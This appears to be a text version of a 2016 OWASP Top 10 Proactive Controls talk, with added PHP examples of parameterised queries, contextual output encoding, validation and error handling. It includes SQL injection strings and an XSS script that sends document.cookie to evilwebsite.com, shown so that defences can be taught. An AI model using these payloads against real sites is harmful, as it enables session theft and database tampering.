OWASP Top 10 Proactive Controls
Katy Anton, @katyanton, October 2016
PHPNW16
OWASP Top 10 Risks - 2013
A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting ( XSS )
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
Katy Anton
• Software development background
• Certified Secure Software Lifecycle Professional (CSSLP)
• Application Security Consultant @Veracode
• OWASP Bristol Chapter Leader
• Project Co-Leader for OWASP Top 10 Proactive Controls
@katyanton
https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016
(Slide of news headlines: a Symfony implementation, disclosure of information, SQL injection.)
New Website
OWASP Application Security Verification Standard (ASVS)
C1. Verify for Security Early and Often
• Choose the level of security for your application
• Security requirements and tests - OWASP ASVS
• Verify for Security Early and Often (OWASP ZAP - continuous integration)
Proactive Control: C1. Verify for security early and often
Risks prevented: All OWASP Top 10 Risks!
SQL injection example
$email = "'; -- @owasp.org";
$sql = "UPDATE user SET email='$email' WHERE id='1'";
Becomes
UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
The comment marker turns the rest of the statement into a comment, so the WHERE clause is lost and the UPDATE runs against every row.
C2. Parameterize Queries
Parameterized queries prevent untrusted input from being interpreted as part of a SQL command.
C2. Control: Data Access Layer
Example of query parametrisation - how not to do it!
PHP:
<?php
$stmt = $dbh->prepare("UPDATE users SET email = {$_GET['email']} WHERE id = $id");
$stmt->execute();

C2: How NOT to
$sql = "UPDATE users SET email = {$_GET['email']} WHERE id = $id";
This one string combines both the code and the input: the SQL parser cannot differentiate between code and user input. Calling prepare() on such a string does not help, because the input was interpolated before the database ever saw the statement.
C2. Control: Data Access Layer
PHP: Query Parametrization - Correct Usage
<?php
$stmt = $dbh->prepare("UPDATE users SET email = :new_email WHERE id = :user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();
Proactive Control: C2. Parameterize Queries
Risks prevented: A1. Injection
XSS example
<script type="text/javascript">
var adr = 'http://evilwebsite.com/send.php?cakemonster=' + escape(document.cookie);
var img = new Image();
img.src = adr;
</script>
C3. Encode Your Output
C3: Controls - Contextual Encoding
• Symfony 2+: Twig
• ZF2: ZendEscaper
Proactive Control: C3. Encode Output
Risks prevented: A1. Injection; A3. XSS
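Contextual encoding done by hand, as an added example that is not code from the slides or from Twig/ZendEscaper: the same untrusted value (the cookie-stealing script from the XSS slide) is placed in four different output contexts, each with the encoder that context needs. It assumes PHP 7.2+ with the mbstring extension.

```php
<?php
// Added example, not code from the slides: output encoding chosen per context
// in plain PHP, standing in for what Twig autoescape or ZendEscaper do.
// Uses the cookie-stealing script from the XSS slide as the untrusted input.
declare(strict_types=1);

// HTML body text and quoted attribute values: encode & < > " ' and replace
// invalid UTF-8 rather than returning an empty string.
function encodeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript string literal inside <script>: every non-alphanumeric character
// becomes \xHH or \uHHHH, so neither a quote nor "</script>" can terminate
// the literal or the script block.
function encodeJs(string $s): string
{
    return preg_replace_callback('/[^a-zA-Z0-9]/u', function (array $m): string {
        $cp = mb_ord($m[0], 'UTF-8');
        if ($cp < 0x80) {
            return sprintf('\\x%02X', $cp);
        }
        if ($cp > 0xFFFF) {                 // astral plane: UTF-16 surrogate pair
            $cp -= 0x10000;
            return sprintf('\\u%04X\\u%04X', 0xD800 + ($cp >> 10), 0xDC00 + ($cp & 0x3FF));
        }
        return sprintf('\\u%04X', $cp);
    }, $s);
}

// Value placed in a URL query string that itself sits in an href attribute:
// two contexts, two encoders, innermost (URL) first.
function encodeUrlParamInAttr(string $s): string
{
    return encodeHtml(rawurlencode($s));
}

// Renders the untrusted value into four contexts of one page.
function renderPage(string $untrusted): string
{
    return '<p>' . encodeHtml($untrusted) . "</p>\n"
         . '<input value="' . encodeHtml($untrusted) . "\">\n"
         . '<script>var greeting = "' . encodeJs($untrusted) . "\";</script>\n"
         . '<a href="/search?q=' . encodeUrlParamInAttr($untrusted) . "\">search</a>\n";
}

// Constructed input: the payload from the XSS slide.
$payload = '<script>var img = new Image(); img.src = "http://evilwebsite.com/send.php?cakemonster=" + escape(document.cookie);</script>';

$html = renderPage($payload);
echo $html;
// Only the template's own <script> tag may survive; the injected one must be inert text.
echo substr_count($html, '<script') === 1 ? "injected script neutralised\n" : "ENCODING FAILED\n";
```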
C4. Validate All Input
C4: Example of Validations
• GET / POST data (including hidden fields)
• File uploads
• HTTP Headers
• Cookies
• Database
C4: Controls
PHP filter extension, available as standard since v5.2.
Example of both validation and sanitisation:
<?php
$sanitised_url = filter_var($url, FILTER_SANITIZE_URL);
if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) {
    echo "This is a valid URL.";
}
Input Validation Prevents 2nd Order SQL Injection
Register form (screenshot: Username and Password fields):
• Two users register: "john" and "john'--"
• The username value "john'--" is stored as-is and later becomes the SQL injection payload
2nd Order SQL Injection Example
Change password form (screenshot: Current Password, New Password, New Password fields), logged in as john'--:
UPDATE users SET password='123' WHERE username='john'--' AND password='abc'
Becomes
UPDATE users SET password='123' WHERE username='john'
The stored username comments out the password check, so the attacker logged in as john'-- has changed john's password without knowing it.
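The 2nd order injection from the change-password slides, reproduced and then stopped by the two controls the deck names, C2 (parameterised queries) and C4 (input validation): an added example, not code from the slides. It runs against an in-memory SQLite database through PDO; the username character set in isValidUsername() is an assumption.

```php
<?php
// Added example, not code from the slides: the 2nd order SQL injection from
// the change-password slides, reproduced against an in-memory SQLite database
// through PDO, with the two controls that stop it: parameterised queries (C2)
// and allow-list validation of the username at registration (C4).
// Passwords are stored in clear here only to mirror the slide; real code
// stores password_hash() output (C5).
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)');

// Registration (parameterised, so the quote in the attacker's name is stored
// literally): the victim "john" and the attacker "john'--".
$register = $db->prepare('INSERT INTO users (username, password) VALUES (:u, :p)');
$register->execute([':u' => 'john', ':p' => 'abc']);
$register->execute([':u' => "john'--", ':p' => 'x']);

// HOW NOT TO: the username read back from the session/database is treated as
// trusted and concatenated into the statement. Returns rows affected.
function changePasswordVulnerable(PDO $db, string $user, string $current, string $new): int
{
    $sql = "UPDATE users SET password='$new' WHERE username='$user' AND password='$current'";
    return $db->exec($sql);
}

// C2: every value is bound, no matter where it came from. Returns rows affected.
function changePasswordSafe(PDO $db, string $user, string $current, string $new): int
{
    $stmt = $db->prepare('UPDATE users SET password=:new WHERE username=:u AND password=:cur');
    $stmt->execute([':new' => $new, ':u' => $user, ':cur' => $current]);
    return $stmt->rowCount();
}

// C4: allow-list validation at registration keeps the payload out of the
// database altogether. The permitted character set is an assumption.
function isValidUsername(string $username): bool
{
    return preg_match('/^[a-z0-9_]{3,32}$/', $username) === 1;
}

function storedPassword(PDO $db, string $username): ?string
{
    $stmt = $db->prepare('SELECT password FROM users WHERE username=:u');
    $stmt->execute([':u' => $username]);
    $value = $stmt->fetchColumn();
    return $value === false ? null : $value;
}

// 1. Logged in as "john'--", the attacker submits a wrong current password.
//    Concatenation yields  WHERE username='john'--' AND password='wrong'
//    and everything after -- is a comment, so john's row is updated.
changePasswordVulnerable($db, "john'--", 'wrong', '123');
printf("vulnerable: john's password is now '%s'\n", storedPassword($db, 'john'));

// 2. Restore john, then repeat with the parameterised version: the literal
//    username "john'--" plus the wrong password matches no row.
changePasswordSafe($db, 'john', '123', 'abc');
$rows = changePasswordSafe($db, "john'--", 'wrong', '123');
printf("parameterised: %d rows changed, john's password is still '%s'\n", $rows, storedPassword($db, 'john'));

// 3. Validation would have rejected the attacker's username at registration.
foreach (['john', "john'--"] as $name) {
    printf("username %-9s valid: %s\n", json_encode($name), isValidUsername($name) ? 'yes' : 'no');
}
```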
Proactive Control: C4. Validate All Input
Risks prevented: A1. Injection; A3. XSS; A10. Unvalidated redirects & forwards
New Website (controls applied so far): C1 Verify for Security Early and Often; C2 Parametrize Queries; C3 Encode Data; C4 Validate Input
C5. Implement Identity and Authentication Control
C5: Best practices
• Secure Password Storage
• Multi-Factor Authentication
• Secure Password Recovery Mechanism
• Transmit sensitive data only over TLS (v1.2)
• Error Messages
• Prevent Brute-Force Attacks
C5. PHP Password storage
• password_hash("my_password", PASSWORD_DEFAULT)
• since PHP v5.5
• compatibility library for versions < 5.5
C5. Password storage - How Not To
$password = bcrypt([salt] + [password], work_factor);
$loginkey = md5(lc([username]) . "::" . lc([password]))
Be consistent when storing sensitive data! The fast, unsalted md5 "login key" of the lowercased password undoes the protection the bcrypt hash provides.
C5. Forgot Password
Forgot password design:
1. Ask one or more security questions
2. Send the user a randomly generated token
3. Verify the token in the same web session
4. Change the password
Resources: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
C5. Error messages
How not to do it! (Screenshots: one error message for a valid user, a different one for a not-registered user.)
Error messages must be identical for both cases, in the HTTP response and in the HTML.
Proactive Control: C5. Establish Identity and Authentication Controls
Risks prevented: A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls
C6: Best Practices
• Deny by default
• Least privilege
• Force all requests to go through access control checks
• Check on the server when each function is accessed
C6: Role vs Resource based ACLs
Resource based:
if (user.isPermitted("project:view:123")) {
    // show the project report button
} else {
    // don't show the button
}

Role based:
if (user.hasRole("Project Manager")) {
    // show the project report button
} else {
    // don't show the button
}

if (user.hasRole("Project Manager") || user.hasRole("Admin")) {
    // show the project report button
} else {
    // don't show the button
}
Proactive Control: C6. Implement Appropriate Access Controls
Risks prevented: A4. Insecure Direct Object References; A7. Missing Function Level Access Control
C7. Protect Data
C7 Controls: Data in transit
Data in transit: HTTPS
• Confidentiality: a spy cannot view your data
• Integrity: a spy cannot change your data
• Authenticity: the server you visit is the right one
MITM Protection - HSTS
• HTTPS + Strict-Transport-Security header
C7 Controls: Data at rest
1. Algorithm: AES (Advanced Encryption Standard)
2. Secure key management
3. Adequate access controls and auditing
Proactive Control: C7. Protect Data
Risks prevented: A6. Sensitive Data Exposure
New Website (controls applied so far): C1 Verify for Security Early and Often; C2 Parametrize Queries; C3 Encode Data; C4 Validate Input; C5 Authentication; C6 Access Controls; C7 Protect Data
C8. Implement Logging and Intrusion Detection
Proactive Control: C8. Logging and Intrusion Detection
Risks prevented: All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries
C9: Examples
• Framework with CSRF protection
• Framework with XSS protection
• ORM - SQL injection prevention
• Vetted cryptographic algorithm
C9: Best Practices
• Use trusted sources
• Low coupling (low coupling == reduced attack surface)
• Update regularly / replace
Proactive Control: C9. Leverage Security Frameworks and Libraries
Risks prevented: All OWASP Top 10 Risks!
C10. Error and Exception Handling
C10: Best Practices
• Centralised error handling
• Verbose enough to explain the issue
• Don't leak critical information
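One central handler that applies all three C10 practices, and feeds the log that C8 relies on: an added example, not code from the slides. The log path, the reference-id format and the sample database error message are constructed for this example.

```php
<?php
// Added example, not code from the slides: centralised handling of every
// uncaught exception and PHP error. The full detail goes to the application
// log for operators (C8); the user gets a generic message plus a reference id
// that ties the two together. The log path and the sample exception message
// are constructed for this example.
declare(strict_types=1);

const APP_ERROR_LOG = '/tmp/app-errors.log';

// Turn warnings and notices into exceptions so they reach the same handler.
set_error_handler(function (int $severity, string $message, string $file, int $line) {
    throw new ErrorException($message, 0, $severity, $file, $line);
});

function handleUncaught(Throwable $e): void
{
    $ref = bin2hex(random_bytes(8));   // quoted by the user, searched for by support

    // Verbose enough to explain the issue: class, message, location, trace and
    // the chain of previous exceptions, but only in the server-side log.
    $record = sprintf("%s ref=%s %s: %s at %s:%d\n%s\n",
        date('c'), $ref, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine(),
        $e->getTraceAsString());
    for ($prev = $e->getPrevious(); $prev !== null; $prev = $prev->getPrevious()) {
        $record .= sprintf("  caused by %s: %s\n", get_class($prev), $prev->getMessage());
    }
    error_log($record, 3, APP_ERROR_LOG);

    // Don't leak critical information: no class name, query, path or stack
    // trace reaches the client, only the reference id.
    http_response_code(500);
    echo "Something went wrong. Please try again later (reference $ref).\n";
}
set_exception_handler('handleUncaught');

// HOW NOT TO: echoing $e->getMessage() to the page would hand the table name
// and SQL state below to whoever triggered the failure. (Constructed message.)
throw new RuntimeException(
    'Saving the order failed',
    0,
    new PDOException("SQLSTATE[42S02]: Base table or view not found: 1146 Table 'shop.orders' doesn't exist")
);
```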
Proactive Control: C10. Error and Exception Handling
Risks prevented: All OWASP Top 10 Risks!
New Website (all controls applied): C1 Verify for Security Early and Often; C2 Parametrize Queries; C3 Encode Data; C4 Validate Input; C5 Authentication; C6 Access Controls; C7 Protect Data; C8 Logging; C9 Leverage Security Frameworks and Libraries; C10 Error Handling
It's a Start To Secure Software by Default!
Reference
OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP_Proactive_Controls
Thank you
